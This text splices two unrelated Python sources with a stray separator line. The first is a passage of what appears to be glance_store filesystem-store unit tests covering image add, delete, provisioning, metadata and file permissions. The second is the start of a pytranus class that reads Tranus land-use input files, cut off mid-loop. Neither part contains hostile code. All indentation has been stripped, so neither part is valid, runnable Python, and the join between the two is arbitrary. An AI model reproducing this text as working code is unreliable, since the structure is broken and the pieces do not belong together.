expected_image_id, image_file, expected_file_size, self.hash_algo)
self.assertEqual(expected_location, loc)
self.assertEqual(expected_file_size, size)
self.assertEqual(expected_checksum, checksum)
self.assertEqual(expected_multihash, multihash)
uri = "file:///%s/%s" % (self.test_dir, expected_image_id)
loc = location.get_location_from_uri(uri, conf=self.conf)
(new_image_file, new_image_size) = self.store.get(loc)
new_image_contents = b""
new_image_file_size = 0
for chunk in new_image_file:
new_image_file_size += len(chunk)
new_image_contents += chunk
self.assertEqual(expected_file_contents, new_image_contents)
self.assertEqual(expected_file_size, new_image_file_size)
def test_thin_provisioning_is_disabled_by_default(self):
self.assertEqual(self.store.thin_provisioning, False)
def test_add_with_thick_provisioning(self):
self._do_test_add(enable_thin_provisioning=False)
def test_add_with_thin_provisioning(self):
self._do_test_add(enable_thin_provisioning=True)
def test_add_thick_provisioning_with_holes_in_file(self):
"""
Tests that a file which contains null-byte chunks is fully
written with a thick provisioning configuration.
"""
chunk_size = units.Ki # 1K
content = b"*" * chunk_size + b"\x00" * chunk_size + b"*" * chunk_size
self._do_test_thin_provisioning(content, 3 * chunk_size, 0, 3, False)
def test_add_thin_provisioning_with_holes_in_file(self):
"""
Tests that a file which contains null-byte chunks is sparsified
with a thin provisioning configuration.
"""
chunk_size = units.Ki # 1K
content = b"*" * chunk_size + b"\x00" * chunk_size + b"*" * chunk_size
self._do_test_thin_provisioning(content, 3 * chunk_size, 1, 2, True)
def test_add_thick_provisioning_without_holes_in_file(self):
"""
Tests that a file which does not contain null-byte chunks is fully
written with a thick provisioning configuration.
"""
chunk_size = units.Ki # 1K
content = b"*" * 3 * chunk_size
self._do_test_thin_provisioning(content, 3 * chunk_size, 0, 3, False)
def test_add_thin_provisioning_without_holes_in_file(self):
"""
Tests that a file which does not contain null-byte chunks is fully
written with a thin provisioning configuration.
"""
chunk_size = units.Ki # 1K
content = b"*" * 3 * chunk_size
self._do_test_thin_provisioning(content, 3 * chunk_size, 0, 3, True)
def test_add_thick_provisioning_with_partial_holes_in_file(self):
"""
Tests that a file which contains null bytes not aligned with
chunk size is fully written with a thick provisioning configuration.
"""
chunk_size = units.Ki # 1K
my_chunk = int(chunk_size * 1.5)
content = b"*" * my_chunk + b"\x00" * my_chunk + b"*" * my_chunk
self._do_test_thin_provisioning(content, 3 * my_chunk, 0, 5, False)
def test_add_thin_provisioning_with_partial_holes_in_file(self):
"""
Tests that a file which contains null bytes not aligned with
chunk size is sparsified with a thin provisioning configuration.
"""
chunk_size = units.Ki # 1K
my_chunk = int(chunk_size * 1.5)
content = b"*" * my_chunk + b"\x00" * my_chunk + b"*" * my_chunk
self._do_test_thin_provisioning(content, 3 * my_chunk, 1, 4, True)
def _do_test_thin_provisioning(self, content, size, truncate, write, thin):
self.config(filesystem_store_chunk_size=units.Ki,
filesystem_thin_provisioning=thin,
group='glance_store')
self.store.configure()
image_file = six.BytesIO(content)
image_id = str(uuid.uuid4())
with mock.patch.object(builtins, 'open') as popen:
self.store.add(image_id, image_file, size, self.hash_algo)
write_count = popen.return_value.__enter__().write.call_count
truncate_count = popen.return_value.__enter__().truncate.call_count
self.assertEqual(write_count, write)
self.assertEqual(truncate_count, truncate)
def test_add_with_verifier(self):
"""Test that 'verifier.update' is called when verifier is provided."""
verifier = mock.MagicMock(name='mock_verifier')
self.config(filesystem_store_chunk_size=units.Ki,
group='glance_store')
self.store.configure()
image_id = str(uuid.uuid4())
file_size = units.Ki # 1K
file_contents = b"*" * file_size
image_file = six.BytesIO(file_contents)
self.store.add(image_id, image_file, file_size, self.hash_algo,
verifier=verifier)
verifier.update.assert_called_with(file_contents)
def test_add_check_metadata_with_invalid_mountpoint_location(self):
in_metadata = [{'id': 'abcdefg',
'mountpoint': '/xyz/images'}]
location, size, checksum, multihash, metadata = self._store_image(
in_metadata)
self.assertEqual({}, metadata)
def test_add_check_metadata_list_with_invalid_mountpoint_locations(self):
in_metadata = [{'id': 'abcdefg', 'mountpoint': '/xyz/images'},
{'id': 'xyz1234', 'mountpoint': '/pqr/images'}]
location, size, checksum, multihash, metadata = self._store_image(
in_metadata)
self.assertEqual({}, metadata)
def test_add_check_metadata_list_with_valid_mountpoint_locations(self):
in_metadata = [{'id': 'abcdefg', 'mountpoint': '/tmp'},
{'id': 'xyz1234', 'mountpoint': '/xyz'}]
location, size, checksum, multihash, metadata = self._store_image(
in_metadata)
self.assertEqual(in_metadata[0], metadata)
def test_add_check_metadata_bad_nosuch_file(self):
expected_image_id = str(uuid.uuid4())
jsonfilename = os.path.join(self.test_dir,
"storage_metadata.%s" % expected_image_id)
self.config(filesystem_store_metadata_file=jsonfilename,
group="glance_store")
expected_file_size = 10
expected_file_contents = b"*" * expected_file_size
image_file = six.BytesIO(expected_file_contents)
location, size, checksum, multihash, metadata = self.store.add(
expected_image_id, image_file, expected_file_size, self.hash_algo)
self.assertEqual(metadata, {})
def test_add_already_existing(self):
"""
Tests that adding an image with an existing identifier
raises an appropriate exception
"""
filesystem.ChunkedFile.CHUNKSIZE = units.Ki
image_id = str(uuid.uuid4())
file_size = 5 * units.Ki # 5K
file_contents = b"*" * file_size
image_file = six.BytesIO(file_contents)
location, size, checksum, multihash, _ = self.store.add(
image_id, image_file, file_size, self.hash_algo)
image_file = six.BytesIO(b"nevergonnamakeit")
self.assertRaises(exceptions.Duplicate,
self.store.add,
image_id, image_file, 0, self.hash_algo)
def _do_test_add_write_failure(self, errno, exception):
filesystem.ChunkedFile.CHUNKSIZE = units.Ki
image_id = str(uuid.uuid4())
file_size = 5 * units.Ki # 5K
file_contents = b"*" * file_size
path = os.path.join(self.test_dir, image_id)
image_file = six.BytesIO(file_contents)
with mock.patch.object(builtins, 'open') as popen:
e = IOError()
e.errno = errno
popen.side_effect = e
self.assertRaises(exception,
self.store.add,
image_id, image_file, 0, self.hash_algo)
self.assertFalse(os.path.exists(path))
def test_add_storage_full(self):
"""
Tests that adding an image without enough space on disk
raises an appropriate exception
"""
self._do_test_add_write_failure(errno.ENOSPC, exceptions.StorageFull)
def test_add_file_too_big(self):
"""
Tests that adding an excessively large image file
raises an appropriate exception
"""
self._do_test_add_write_failure(errno.EFBIG, exceptions.StorageFull)
def test_add_storage_write_denied(self):
"""
Tests that adding an image with insufficient filestore permissions
raises an appropriate exception
"""
self._do_test_add_write_failure(errno.EACCES,
exceptions.StorageWriteDenied)
def test_add_other_failure(self):
"""
Tests that a non-space-related IOError does not raise a
StorageFull exception.
"""
self._do_test_add_write_failure(errno.ENOTDIR, IOError)
def test_add_cleanup_on_read_failure(self):
"""
Tests that the partial image file is cleaned up after a read
failure.
"""
filesystem.ChunkedFile.CHUNKSIZE = units.Ki
image_id = str(uuid.uuid4())
file_size = 5 * units.Ki # 5K
file_contents = b"*" * file_size
path = os.path.join(self.test_dir, image_id)
image_file = six.BytesIO(file_contents)
def fake_Error(size):
raise AttributeError()
with mock.patch.object(image_file, 'read') as mock_read:
mock_read.side_effect = fake_Error
self.assertRaises(AttributeError,
self.store.add,
image_id, image_file, 0, self.hash_algo)
self.assertFalse(os.path.exists(path))
def test_delete(self):
"""
Test we can delete an existing image in the filesystem store
"""
# First add an image
image_id = str(uuid.uuid4())
file_size = 5 * units.Ki # 5K
file_contents = b"*" * file_size
image_file = six.BytesIO(file_contents)
loc, size, checksum, multihash, _ = self.store.add(
image_id, image_file, file_size, self.hash_algo)
# Now check that we can delete it
uri = "file:///%s/%s" % (self.test_dir, image_id)
loc = location.get_location_from_uri(uri, conf=self.conf)
self.store.delete(loc)
self.assertRaises(exceptions.NotFound, self.store.get, loc)
def test_delete_non_existing(self):
"""
Test that trying to delete a file that doesn't exist
raises an error
"""
loc = location.get_location_from_uri(
"file:///tmp/glance-tests/non-existing", conf=self.conf)
self.assertRaises(exceptions.NotFound,
self.store.delete,
loc)
def test_delete_forbidden(self):
"""
Tests that trying to delete a file without permissions
raises the correct error
"""
# First add an image
image_id = str(uuid.uuid4())
file_size = 5 * units.Ki # 5K
file_contents = b"*" * file_size
image_file = six.BytesIO(file_contents)
loc, size, checksum, multihash, _ = self.store.add(
image_id, image_file, file_size, self.hash_algo)
uri = "file:///%s/%s" % (self.test_dir, image_id)
loc = location.get_location_from_uri(uri, conf=self.conf)
# Mock unlink to raise an OSError for lack of permissions
# and make sure we can't delete the image
with mock.patch.object(os, 'unlink') as unlink:
e = OSError()
e.errno = errno.EACCES
unlink.side_effect = e
self.assertRaises(exceptions.Forbidden,
self.store.delete,
loc)
# Make sure the image didn't get deleted
self.store.get(loc)
def test_configure_add_with_multi_datadirs(self):
"""
Tests that multiple filesystem directories specified by
filesystem_store_datadirs are parsed correctly.
"""
store_map = [self.useFixture(fixtures.TempDir()).path,
self.useFixture(fixtures.TempDir()).path]
self.conf.set_override('filesystem_store_datadir',
override=None,
group='glance_store')
self.conf.set_override('filesystem_store_datadirs',
[store_map[0] + ":100",
store_map[1] + ":200"],
group='glance_store')
self.store.configure_add()
expected_priority_map = {100: [store_map[0]], 200: [store_map[1]]}
expected_priority_list = [200, 100]
self.assertEqual(expected_priority_map, self.store.priority_data_map)
self.assertEqual(expected_priority_list, self.store.priority_list)
def test_configure_add_with_metadata_file_success(self):
metadata = {'id': 'asdf1234',
'mountpoint': '/tmp'}
self._create_metadata_json_file(metadata)
self.store.configure_add()
self.assertEqual([metadata], self.store.FILESYSTEM_STORE_METADATA)
def test_configure_add_check_metadata_list_of_dicts_success(self):
metadata = [{'id': 'abcdefg', 'mountpoint': '/xyz/images'},
{'id': 'xyz1234', 'mountpoint': '/tmp/'}]
self._create_metadata_json_file(metadata)
self.store.configure_add()
self.assertEqual(metadata, self.store.FILESYSTEM_STORE_METADATA)
def test_configure_add_check_metadata_success_list_val_for_some_key(self):
metadata = {'akey': ['value1', 'value2'], 'id': 'asdf1234',
'mountpoint': '/tmp'}
self._create_metadata_json_file(metadata)
self.store.configure_add()
self.assertEqual([metadata], self.store.FILESYSTEM_STORE_METADATA)
def test_configure_add_check_metadata_bad_data(self):
metadata = {'akey': 10, 'id': 'asdf1234',
'mountpoint': '/tmp'} # only unicode is allowed
self._create_metadata_json_file(metadata)
self.assertRaises(exceptions.BadStoreConfiguration,
self.store.configure_add)
def test_configure_add_check_metadata_with_no_id_or_mountpoint(self):
metadata = {'mountpoint': '/tmp'}
self._create_metadata_json_file(metadata)
self.assertRaises(exceptions.BadStoreConfiguration,
self.store.configure_add)
metadata = {'id': 'asdfg1234'}
self._create_metadata_json_file(metadata)
self.assertRaises(exceptions.BadStoreConfiguration,
self.store.configure_add)
def test_configure_add_check_metadata_id_or_mountpoint_is_not_string(self):
metadata = {'id': 10, 'mountpoint': '/tmp'}
self._create_metadata_json_file(metadata)
self.assertRaises(exceptions.BadStoreConfiguration,
self.store.configure_add)
metadata = {'id': 'asdf1234', 'mountpoint': 12345}
self._create_metadata_json_file(metadata)
self.assertRaises(exceptions.BadStoreConfiguration,
self.store.configure_add)
def test_configure_add_check_metadata_list_with_no_id_or_mountpoint(self):
metadata = [{'id': 'abcdefg', 'mountpoint': '/xyz/images'},
{'mountpoint': '/pqr/images'}]
self._create_metadata_json_file(metadata)
self.assertRaises(exceptions.BadStoreConfiguration,
self.store.configure_add)
metadata = [{'id': 'abcdefg'},
{'id': 'xyz1234', 'mountpoint': '/pqr/images'}]
self._create_metadata_json_file(metadata)
self.assertRaises(exceptions.BadStoreConfiguration,
self.store.configure_add)
def test_add_check_metadata_list_id_or_mountpoint_is_not_string(self):
metadata = [{'id': 'abcdefg', 'mountpoint': '/xyz/images'},
{'id': 1234, 'mountpoint': '/pqr/images'}]
self._create_metadata_json_file(metadata)
self.assertRaises(exceptions.BadStoreConfiguration,
self.store.configure_add)
metadata = [{'id': 'abcdefg', 'mountpoint': 1234},
{'id': 'xyz1234', 'mountpoint': '/pqr/images'}]
self._create_metadata_json_file(metadata)
self.assertRaises(exceptions.BadStoreConfiguration,
self.store.configure_add)
def test_configure_add_same_dir_multiple_times(self):
"""
Tests that a BadStoreConfiguration exception is raised if the same
directory is specified multiple times (with different priorities) in
filesystem_store_datadirs.
"""
store_map = [self.useFixture(fixtures.TempDir()).path,
self.useFixture(fixtures.TempDir()).path]
self.conf.clear_override('filesystem_store_datadir',
group='glance_store')
self.conf.set_override('filesystem_store_datadirs',
[store_map[0] + ":100",
store_map[1] + ":200",
store_map[0] + ":300"],
group='glance_store')
self.assertRaises(exceptions.BadStoreConfiguration,
self.store.configure_add)
def test_configure_add_same_dir_multiple_times_same_priority(self):
"""
Tests that no BadStoreConfiguration exception is raised if the same
directory is specified multiple times with the same priority in
filesystem_store_datadirs.
"""
store_map = [self.useFixture(fixtures.TempDir()).path,
self.useFixture(fixtures.TempDir()).path]
self.conf.set_override('filesystem_store_datadir',
override=None,
group='glance_store')
self.conf.set_override('filesystem_store_datadirs',
[store_map[0] + ":100",
store_map[1] + ":200",
store_map[0] + ":100"],
group='glance_store')
try:
self.store.configure()
except exceptions.BadStoreConfiguration:
self.fail("configure() raised BadStoreConfiguration unexpectedly!")
# Test that we can add an image via the filesystem backend
filesystem.ChunkedFile.CHUNKSIZE = 1024
expected_image_id = str(uuid.uuid4())
expected_file_size = 5 * units.Ki # 5K
expected_file_contents = b"*" * expected_file_size
expected_checksum = md5(expected_file_contents,
usedforsecurity=False).hexdigest()
expected_multihash = hashlib.sha256(expected_file_contents).hexdigest()
expected_location = "file://%s/%s" % (store_map[1],
expected_image_id)
image_file = six.BytesIO(expected_file_contents)
loc, size, checksum, multihash, _ = self.store.add(
expected_image_id, image_file, expected_file_size, self.hash_algo)
self.assertEqual(expected_location, loc)
self.assertEqual(expected_file_size, size)
self.assertEqual(expected_checksum, checksum)
self.assertEqual(expected_multihash, multihash)
loc = location.get_location_from_uri(expected_location,
conf=self.conf)
(new_image_file, new_image_size) = self.store.get(loc)
new_image_contents = b""
new_image_file_size = 0
for chunk in new_image_file:
new_image_file_size += len(chunk)
new_image_contents += chunk
self.assertEqual(expected_file_contents, new_image_contents)
self.assertEqual(expected_file_size, new_image_file_size)
def test_add_with_multiple_dirs(self):
"""Test adding multiple filesystem directories."""
store_map = [self.useFixture(fixtures.TempDir()).path,
self.useFixture(fixtures.TempDir()).path]
self.conf.set_override('filesystem_store_datadir',
override=None,
group='glance_store')
self.conf.set_override('filesystem_store_datadirs',
[store_map[0] + ":100",
store_map[1] + ":200"],
group='glance_store')
self.store.configure()
# Test that we can add an image via the filesystem backend
filesystem.ChunkedFile.CHUNKSIZE = units.Ki
expected_image_id = str(uuid.uuid4())
expected_file_size = 5 * units.Ki # 5K
expected_file_contents = b"*" * expected_file_size
expected_checksum = md5(expected_file_contents,
usedforsecurity=False).hexdigest()
expected_multihash = hashlib.sha256(expected_file_contents).hexdigest()
expected_location = "file://%s/%s" % (store_map[1],
expected_image_id)
image_file = six.BytesIO(expected_file_contents)
loc, size, checksum, multihash, _ = self.store.add(
expected_image_id, image_file, expected_file_size, self.hash_algo)
self.assertEqual(expected_location, loc)
self.assertEqual(expected_file_size, size)
self.assertEqual(expected_checksum, checksum)
self.assertEqual(expected_multihash, multihash)
loc = location.get_location_from_uri(expected_location,
conf=self.conf)
(new_image_file, new_image_size) = self.store.get(loc)
new_image_contents = b""
new_image_file_size = 0
for chunk in new_image_file:
new_image_file_size += len(chunk)
new_image_contents += chunk
self.assertEqual(expected_file_contents, new_image_contents)
self.assertEqual(expected_file_size, new_image_file_size)
def test_add_with_multiple_dirs_storage_full(self):
"""
Test StorageFull exception is raised if no filesystem directory
is found that can store an image.
"""
store_map = [self.useFixture(fixtures.TempDir()).path,
self.useFixture(fixtures.TempDir()).path]
self.conf.set_override('filesystem_store_datadir',
override=None,
group='glance_store')
self.conf.set_override('filesystem_store_datadirs',
[store_map[0] + ":100",
store_map[1] + ":200"],
group='glance_store')
self.store.configure_add()
def fake_get_capacity_info(mount_point):
return 0
with mock.patch.object(self.store, '_get_capacity_info') as capacity:
capacity.return_value = 0
filesystem.ChunkedFile.CHUNKSIZE = units.Ki
expected_image_id = str(uuid.uuid4())
expected_file_size = 5 * units.Ki # 5K
expected_file_contents = b"*" * expected_file_size
image_file = six.BytesIO(expected_file_contents)
self.assertRaises(exceptions.StorageFull,
self.store.add,
expected_image_id,
image_file,
expected_file_size,
self.hash_algo)
def test_configure_add_with_file_perm(self):
"""
Tests that the file permission specified by filesystem_store_file_perm
is parsed correctly.
"""
store = self.useFixture(fixtures.TempDir()).path
self.conf.set_override('filesystem_store_datadir', store,
group='glance_store')
self.conf.set_override('filesystem_store_file_perm', 700, # -rwx------
group='glance_store')
self.store.configure_add()
self.assertEqual(self.store.datadir, store)
def test_configure_add_with_unaccessible_file_perm(self):
"""
Tests BadStoreConfiguration exception is raised if an invalid
file permission is specified in filesystem_store_file_perm.
"""
store = self.useFixture(fixtures.TempDir()).path
self.conf.set_override('filesystem_store_datadir', store,
group='glance_store')
self.conf.set_override('filesystem_store_file_perm', 7, # -------rwx
group='glance_store')
self.assertRaises(exceptions.BadStoreConfiguration,
self.store.configure_add)
def test_add_with_file_perm_for_group_other_users_access(self):
"""
Test that we can add an image via the filesystem backend with a
required image file permission.
"""
store = self.useFixture(fixtures.TempDir()).path
self.conf.set_override('filesystem_store_datadir', store,
group='glance_store')
self.conf.set_override('filesystem_store_file_perm', 744, # -rwxr--r--
group='glance_store')
# -rwx------
os.chmod(store, 0o700)
self.assertEqual(0o700, stat.S_IMODE(os.stat(store)[stat.ST_MODE]))
self.store.configure_add()
filesystem.Store.WRITE_CHUNKSIZE = units.Ki
expected_image_id = str(uuid.uuid4())
expected_file_size = 5 * units.Ki # 5K
expected_file_contents = b"*" * expected_file_size
expected_checksum = md5(expected_file_contents,
usedforsecurity=False).hexdigest()
expected_multihash = hashlib.sha256(expected_file_contents).hexdigest()
expected_location = "file://%s/%s" % (store,
expected_image_id)
image_file = six.BytesIO(expected_file_contents)
location, size, checksum, multihash, _ = self.store.add(
expected_image_id, image_file, expected_file_size, self.hash_algo)
self.assertEqual(expected_location, location)
self.assertEqual(expected_file_size, size)
self.assertEqual(expected_checksum, checksum)
self.assertEqual(expected_multihash, multihash)
# -rwx--x--x for store directory
self.assertEqual(0o711, stat.S_IMODE(os.stat(store)[stat.ST_MODE]))
# -rwxr--r-- for image file
mode = os.stat(expected_location[len('file:/'):])[stat.ST_MODE]
perm = int(str(self.conf.glance_store.filesystem_store_file_perm), 8)
self.assertEqual(perm, stat.S_IMODE(mode))
def test_add_with_file_perm_for_owner_users_access(self):
"""
Test that we can add an image via the filesystem backend with a
required image file permission.
"""
store = self.useFixture(fixtures.TempDir()).path
self.conf.set_override('filesystem_store_datadir', store,
group='glance_store')
self.conf.set_override('filesystem_store_file_perm', 600, # -rw-------
group='glance_store')
# -rwx------
os.chmod(store, 0o700)
self.assertEqual(0o700, stat.S_IMODE(os.stat(store)[stat.ST_MODE]))
self.store.configure_add()
filesystem.Store.WRITE_CHUNKSIZE = units.Ki
expected_image_id = str(uuid.uuid4())
expected_file_size = 5 * units.Ki # 5K
expected_file_contents = b"*" * expected_file_size
expected_checksum = md5(expected_file_contents,
usedforsecurity=False).hexdigest()
expected_multihash = hashlib.sha256(expected_file_contents).hexdigest()
expected_location = "file://%s/%s" % (store,
expected_image_id)
image_file = six.BytesIO(expected_file_contents)
location, size, checksum, multihash, _ = self.store.add(
expected_image_id, image_file, expected_file_size, self.hash_algo)
self.assertEqual(expected_location, location)
self.assertEqual(expected_file_size, size)
self.assertEqual(expected_checksum, checksum)
self.assertEqual(expected_multihash, multihash)
# -rwx------ for store directory
self.assertEqual(0o700, stat.S_IMODE(os.stat(store)[stat.ST_MODE]))
# -rw------- for image file
mode = os.stat(expected_location[len('file:/'):])[stat.ST_MODE]
perm = int(str(self.conf.glance_store.filesystem_store_file_perm), 8)
self.assertEqual(perm, stat.S_IMODE(mode))
def test_configure_add_chunk_size(self):
# This definitely won't be the default
chunk_size = units.Gi
self.config(filesystem_store_chunk_size=chunk_size,
group="glance_store")
self.store.configure_add()
self.assertEqual(chunk_size, self.store.chunk_size)
self.assertEqual(chunk_size, self.store.READ_CHUNKSIZE)
self.assertEqual(chunk_size, self.store.WRITE_CHUNKSIZE)
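# Hedged sketch (not the glance_store implementation): the thin-provisioning
# tests above expect one truncate() call per all-zero chunk and one write()
# call per non-zero chunk. A minimal writer with that behaviour could look
# like the function below; `path` and `chunks` are illustrative parameters.
def _example_sparse_write(path, chunks, thin=True):
    """Write chunks to path, leaving sparse holes for all-zero chunks."""
    with open(path, 'wb') as f:
        for chunk in chunks:
            if thin and chunk.count(b'\x00') == len(chunk):
                # Grow the file without writing data; filesystems that
                # support sparse files will not allocate blocks here.
                f.truncate(f.tell() + len(chunk))
                f.seek(0, os.SEEK_END)
            else:
                f.write(chunk)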
|
#! /usr/bin/env python
from pytranus.support import TranusConfig
from pytranus.support import BinaryInterface
import numpy as np
import logging
import sys
import os.path
def line_remove_strings(L): # takes a line of section 2.1 of the L1E file and returns it with the string tokens removed
return [x for x in L if is_float(x)]
def is_float(s):
''' little function to verify whether a string can be converted into a number '''
try:
float(s)
return True
except ValueError:
return False
class LcalParam:
'''LcalParam class:
This class is meant to read all the Tranus LCAL input files, and store
the lines in local variables.
'''
def __init__(self, t, normalize = True):
'''LcalParam(tranusConfig)
Constructor of the class, this object has a local variable for each of the
Tranus lines relevants to LCAL.
Parameters
----------
tranusConfig : TranusConfig object
The corresponding TranusConfig object of your project.
Class Attributes
----------------
list_zones: list
List of zones.
list_zones_ext: list
List of external zones.
nZones: integer (len(list_zones))
Number of zones in list_zones.
list_sectors: list
List of Economical Sectors.
nSectors: integer (len(list_sectors))
Number of Economical Sectors.
housingSectors: 1-dimensional ndarray
Subset of list_sectors including the land-use housing sectors.
substitutionSectors: 1-dimensional ndarray
Subset of list_sectors that have substitution.
Variables from L0E section 1.1, and their corresponding initialized value:
ExogProd = np.zeros((nSectors,nZones))
Exogenous base-year Production X* for each sector and zone.
InduProd = np.zeros((nSectors,nZones))
Induced base-year Production X_0 for each sector and zone.
ExogDemand = np.zeros((nSectors,nZones))
Exogenous Demand for each sector and zone.
Price = np.zeros((nSectors,nZones))
Base-year prices for each sector and zone.
ValueAdded = np.zeros((nSectors,nZones))
Value Added for each sector and zone.
Attractor = np.zeros((nSectors,nZones))
Attractors W^n_i for each sector and zone.
Rmin = np.zeros((nSectors,nZones))
Lower limit to production; not used in LCAL.
Rmax = np.zeros((nSectors,nZones))
Upper limit to production; not used in LCAL.
Variables from L1E section 2.1:
alfa = np.zeros(nSectors)
Exponent in the Attractor formula.
beta = np.zeros(nSectors)
Dispersion parameter in Pr^n_{ij}
lamda = np.zeros(nSectors)
Marginal Localization Utility of price.
thetaLoc = np.zeros(nSectors)
Exponent in normalization in Localization Utility, not used.
Variables from L1E section 2.2:
demax = np.zeros((nSectors,nSectors))
Elastic demand function max value, for housing consuming->land-use
sectors.
demin = np.zeros((nSectors,nSectors))
Elastic demand function min value, for housing consuming->land-use
sectors.
delta = np.zeros((nSectors,nSectors))
Dispersion parameter in the demand function a^{mn}_i
Variables from L1E section 2.3:
sigma = np.zeros(nSectors)
Dispersion parameter in Substitution logit, no longer used.
thetaSub = np.zeros(nSectors)
Exponent in normalization in substitution logit, not used.
omega = np.zeros((nSectors,nSectors))
Relative weight in substitution logit.
Kn = np.zeros((nSectors,nSectors),dtype=int)
Set of possible substitution sectors.
Variables from L1E section 3.2:
bkn = np.zeros((nSectors,nSectors))
Coefficients of the attractor weight.
Disutil transport, monetary cost transport from C1S:
t_nij = np.zeros((nSectors,nZones,nZones))
Disutility of transportation between two zones for a given sector.
tm_nij = np.zeros((nSectors,nZones,nZones))
Monetary cost of transportation between two zones for a given sector.
'''
self.list_zones,self.list_zones_ext = t.numberingZones() # list of zones [1,2,4,5,8,....
self.nZones = len(self.list_zones) #number of zones: 225
self.sectors_names = [] #list of names of sectors (from file L1E)
self.list_sectors = t.numberingSectors() # list of sectors
self.nSectors = len(self.list_sectors) #number of sectors: 20
self.housingSectors = np.array([-1]) #array not initialized
self.substitutionSectors = np.array([-1]) #array not initialized
#Variables from L0E section 1.1
self.ExogProd = np.zeros((self.nSectors,self.nZones))
self.InduProd = np.zeros((self.nSectors,self.nZones))
self.ExogDemand = np.zeros((self.nSectors,self.nZones))
self.Price = np.zeros((self.nSectors,self.nZones))
self.ValueAdded = np.zeros((self.nSectors,self.nZones))
self.Attractor = np.zeros((self.nSectors,self.nZones))
self.Rmin = np.zeros((self.nSectors,self.nZones))
self.Rmax = np.zeros((self.nSectors,self.nZones))
#Variables from L1E section 2.1
self.alfa = np.zeros(self.nSectors)
self.beta = np.zeros(self.nSectors)
self.lamda = np.zeros(self.nSectors)
self.thetaLoc = np.zeros(self.nSectors)
#Variables from L1E section 2.2
self.demax = np.zeros((self.nSectors,self.nSectors))
self.demin = np.zeros((self.nSectors,self.nSectors))
self.delta = np.zeros((self.nSectors,self.nSectors))
#Variables from L1E section 2.3
self.sigma = np.zeros(self.nSectors)
self.thetaSub = np.zeros(self.nSectors)
self.omega = np.zeros((self.nSectors,self.nSectors))
self.Kn = np.zeros((self.nSectors,self.nSectors), dtype=int)
#Variables from L1E section 3.2
self.bkn = np.zeros((self.nSectors,self.nSectors))
#Disutil transport, monetary cost transport from C1S
self.t_nij = np.zeros((self.nSectors,self.nZones,self.nZones))
self.tm_nij = np.zeros((self.nSectors,self.nZones,self.nZones))
self.read_files(t)
if normalize:
self.normalize()
return
def read_files(self, t):
'''read_files(t)
Reads the files L0E, L1E and C1S to load the LCAL lines into the
Lcalparam object.
Parameters
----------
t : TranusConfig object
The TranusConfig file of your project.
Example
-------
You could use this method for reloading the lines from the files
after doing modifications.
>>>filename = '/ExampleC_n/'
>>>t = TranusConfig(nworkingDirectory = filename)
>>>param = Lcalparam(t)
>>>param.beta
array([ 0., 1., 1., 3., 0.])
#modify some parameter, for example:
>>>param.beta[2]=5
>>>param.beta
array([ 0., 1., 5., 3., 0.])
>>>param.read_files(t)
>>>param.beta
array([ 0., 1., 1., 3., 0.])
'''
print " Loading Lcal object from: %s"%t.workingDirectory
self.read_C1S(t)
self.read_L0E(t)
self.read_L1E(t)
return
def read_L0E(self,t):
'''read_L0E(t)
Reads the corresponding L0E file located in the workingDirectory.
Stores what is read in local variables of the Lcalparam object.
This method is hardcoded, meaning that if the file structure of the
L0E file changes, this method probably needs to be updated as well.
It's not meant to be used externally, it's used when you call the
constructor of the class.
'''
filename=os.path.join(t.workingDirectory,t.obs_file)
logging.debug("Reading Localization Data File (L0E), [%s]", filename)
filer = open(filename, 'r')
lines = filer.readlines()
filer.close()
length_lines = len(lines)
for i in range(length_lines):
lines[i]=str.split(lines[i])
""" Section that we are interested in. """
string = "1.1"
""" Getting the section line number within the file. """
for line in range(len(lines)):
if (lines[line][0] == string):
break
""" End of section. This is horribly harcoded as we depend
on the format of the Tranus lines files and we don't have any control
over it. Also, this format will probably change in the future, hopefully
to a standarized one.
"""
end_of_section = "*-"
line+=2 #puts you in the first line for reading
while lines[line][0][0:2] != end_of_section:
n,i=self.list_sectors.index(float(lines[line][0])),self.list_zones.index(float(lines[line][1])) #n,i=sector,zone
self.ExogProd[n,i] =lines[line][2]
self.InduProd[n,i] =lines[line][3]
self.ExogDemand[n,i] =lines[line][4]
self.Price[n,i] =lines[line][5]
self.ValueAdded[n,i] =lines[line][6]
self.Attractor[n,i] =lines[line][7]
line+=1
""" Filter sectors """
string = "2.1"
""" Getting the section line number within the file. """
for line in range(len(lines)):
if (lines[line][0] == string):
break
line+=2 #puts you in the first line for reading
while lines[line][0][0:2] != end_of_section:
n,i=self.list_sectors.index(float(lines[line][0])),self.list_zones.index(float(lines[line][1]))
self.ExogDemand[n,i] =lines[line][2]
line+=1
string = "2.2"
""" Getting the section line number within the file. """
for line in range(len(lines)):
if (lines[line][0] == string):
break
line+=2 #puts you in the first line for reading
while lines[line][0][0:2] != end_of_section:
n,i=self.list_sectors.index(float(lines[line][0])),self.list_zones.index(float(lines[line][1]))
self.Rmin[n,i] =lines[line][2]
self.Rmax[n,i] =lines[line][3]
line+=1
string = "3."
""" Getting the section line number within the file. """
for line in range(len(lines)):
if (lines[line][0] == string):
break
line+=2 #puts you in the first line for reading
list_housing=[]
while lines[line][0][0:2] != end_of_section:
n,i=self.list_sectors.index(float(lines[line][0])),self.list_zones.index(float(lines[line][1]))
if n not in list_housing:
list_housing.append(n)
self.Rmin[n,i] =lines[line][2]
self.Rmax[n,i] =lines[line][3]
line+=1
self.housingSectors=np.array(list_housing)
return
def read_C1S(self,t):
'''read_C1S(t)
Reads COST_T.MTX and DISU_T.MTX files generated using ./mats from the
C1S file. Normally, these files are created when you first create your
TranusConfig file.
Stores what is read in local variables of the LCALparam object.
This method is hardcoded, meaning that if the file structure of the
COST_T.MTX and DISU_T.MTX files changes, this method probably needs
to be updated as well.
It's not meant to be used externally, it's used when you call the
constructor of the class.
'''
interface = BinaryInterface(t)
if not os.path.isfile(os.path.join(t.workingDirectory,"COST_T.MTX")):
logging.debug(os.path.join(t.workingDirectory,"COST_T.MTX")+': not found!')
logging.debug("Creating Cost Files with ./mats")
if interface.runMats() != 1:
logging.error('Generating Disutility files has failed')
return
#Reads the C1S file using mats
#this is hardcoded because we are using intermediate files DISU_T.MTX and COST_T.MTX
path = t.workingDirectory
logging.debug("Reading Activity Location Parameters File (C1S) with Mats")
filer = open(os.path.join(path,"COST_T.MTX"), 'r')
lines = filer.readlines()
filer.close()
sector_line=4 #line where the 1st Sector is written
line=9 #line where the matrix begins
# print 'Zones: %s'%self.nZones
while line<len(lines):
n=int(lines[sector_line][0:4])
z = 0
while True:
param_line = (lines[line][0:4]+lines[line][25:]).split()
if len(param_line)==0:
break
try:
i=int(param_line[0])
aux_z = self.list_zones.index(i)
# print aux_z
